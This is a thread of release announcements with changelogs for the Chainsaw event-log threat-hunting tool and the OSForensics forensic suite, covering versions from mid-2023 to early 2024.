    Tweaks and improvements to mappings and rules

https://github.com/WithSecureLabs/chainsaw
Title: Chainsaw 2.7.1
Posted by: SiLæncer on 06 July, 2023, 21:30
What's new:

This release contains the following changes of note:

    Fix mutually exclusive command line options -c can only be used with --jsonl
    Error if caching file cannot be created
    Make sure thread count is respected everywhere
    Better handling of sigma rules (warn on unknown modifiers, and support base64 conversions)
    Additional optimisations to jsonl output

https://github.com/WithSecureLabs/chainsaw
Title: Chainsaw 2.7.2
Posted by: SiLæncer on 09 July, 2023, 22:00
(https://i.postimg.cc/fywgtSMD/screenshot-2299.png)
Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and MFTs. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

License: GPLv3

What's new:

    More optimisations.
    Fix some issues with -t arguments.

https://github.com/WithSecureLabs/chainsaw
Title: OSForensics 10.0.1015
Posted by: SiLæncer on 19 July, 2023, 19:00
(https://i.postimg.cc/VkxNN7rC/screenshot-2371.png)
OSForensics is an application that enables you to thoroughly check and scan a computer for any piece of evidence that might offer you insight, by checking anything from email archives, deleted files and even web browsing history. In addition, you can organize the evidence by creating separate cases, which can hold the data separate from each other.

Changelog

    Create Index:

    Fixed possible crash when using the 'Don't know/Prescan' option

    Logical Cloud Drive Imaging:

    OneDrive, fixed possible discrepancy between the file size when summing all the files and the drive size from querying the user's root. When creating a logical drive, it will use the maximum size between both methods.

    Password Decrypt:

    Brute Force, fixed bug when using Custom Random Dictionary for individual work queue items: the Brute Force settings were not being saved

    Search Index:

    Fixed issue when loading a UTF-8 wordlist file without a BOM

    User Activity:

    Fixed possible crash when using the 'Autorun Commands' option


http://www.osforensics.com/
Title: Chainsaw 2.7.3
Posted by: SiLæncer on 16 August, 2023, 19:00
What's new:

    New Chainsaw rules
    Fixing JSONL outputting issues for dump and search
    Updated dependencies

https://github.com/WithSecureLabs/chainsaw
Title: Chainsaw 2.8.0
Posted by: SiLæncer on 08 October, 2023, 10:00
What's new:

Support for parsing ESE databases and analysing SRUM databases
New Chainsaw rules
Full output support for aggregations

https://github.com/WithSecureLabs/chainsaw
Title: OSForensics 10.0.1016
Posted by: SiLæncer on 10 October, 2023, 19:00
What's new:

    File Name Search:

    Changed to show 'Multiple directories selected' in directory field instead of the first directory being scanned if multiple directories are selected
    Fixed issue where it would add to the directories to scan rather than replacing them when switching between different directories

    Registry Viewer:

    Fixed bug where Time Zone values were incorrect (only first byte of integer value returned) when exporting System Hive

    User Activity:

    Fixed potential buffer overflow issue during the Event Log rendering

http://www.osforensics.com/
Title: Chainsaw 2.8.1
Posted by: SiLæncer on 21 November, 2023, 22:00
What's new:

    Fixes and tweaks for SRUM
    Updated dependencies

https://github.com/WithSecureLabs/chainsaw
Title: OSForensics 11.0.1005
Posted by: SiLæncer on 28 February, 2024, 20:00
Changelog


    Deleted Files Search:

    Fixed recovered partitions not being scanned on first access
    Removed error message being displayed when invalid NTFS partition found (eg. recovered partitions)

    Manage Case:

    Fixed issue when adding new category and reordering immediately afterwards would not save the correct order
    Fixed issue where categories from pre-V11 cases would not sort properly
    Fixed issue where exporting categories would not include changes made in the current Edit case window
    Fixed issue where the report was generating but did not complete properly until OSF was closed

    Misc:

    Updated WinPEBuilder to V1.2.108
    Fixed being unable to boot on some older Win7 machines


http://www.osforensics.com/
Title: OSForensics 11.0.1006
Posted by: SiLæncer on 04 March, 2024, 10:00
Changelog


    Email Viewer:

    Added a warning message, shown when the system lacks the Outlook MAPI library, that exported MSG files will be saved in OLE format

    Hashing:

    Fixed possible crash when calculating hashes

    User Activity:

    Changed to auto-uncheck Moved Downloads if Downloads was unchecked (needs Download checked to run)


http://www.osforensics.com/
Title: OSForensics 11.0.1007
Posted by: SiLæncer on 20 March, 2024, 09:00
Changelog


    Android Artifacts:

    Added destination target write permissions check before launching acquisition
    Fixed issue where the OSFExtract-data.xml file was not created properly under certain conditions (e.g. failed to create the OSFExtract folder in the destination target)
    Fixed issue where the image was not loaded properly when the OSFExtract-data.xml file was placed in the root folder instead of in the OSFExtract folder
    Updated logs display format

    Deleted Files Search:

    Fixed hash calculation using "DirectAccess" version instead of "buffer" version of file

    Drive Preparation:

    Fixed issue where this module was unable to be run on Drive-0

    File Viewer:

    Fix lockup of internal viewer when attempting to read past media stream size

    Hash Sets:

    Updated to include total # files to hash in 'Files hashed' field
    Updated to display # files with errors

    Manage Case:

    Removed category ID column from Case Edit window - Case Categories tab

    User Activity:

    Fixed possible crash when scanning VLC .ini file
    Fixed issue where OSF got stuck scanning Event Logs on Linux
    Config, Changed to auto uncheck Moved Downloads if Downloads is unchecked

    Misc:

    Fixed possible crash when running USB install
    Updated OSFMount to V3.1.1003


http://www.osforensics.com/
Title: Chainsaw 2.9.0
Posted by: SiLæncer on 15 April, 2024, 21:00
What's new:

    More native rules
    Ability to change default conditional when searching
    Fix for setting of timezones

https://github.com/WithSecureLabs/chainsaw